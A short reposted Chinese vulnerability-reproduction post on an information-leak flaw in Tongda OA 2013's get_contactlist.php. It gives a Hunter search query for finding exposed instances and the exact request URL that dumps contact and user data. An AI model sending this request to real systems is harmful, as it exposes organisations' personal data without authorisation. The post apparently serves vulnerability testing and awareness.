自学内容网 自学内容网

【漏洞复现-通达OA】通达OA get_contactlist.php 敏感信息泄漏漏洞

一、漏洞简介

通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。

二、影响版本

● 通达OA2013

三、资产测绘

● hunterapp.name="通达 OA"
● 特征
在这里插入图片描述四、漏洞复现

/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3

在这里插入图片描述


原文地址:https://blog.csdn.net/qq_33331244/article/details/136154102

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!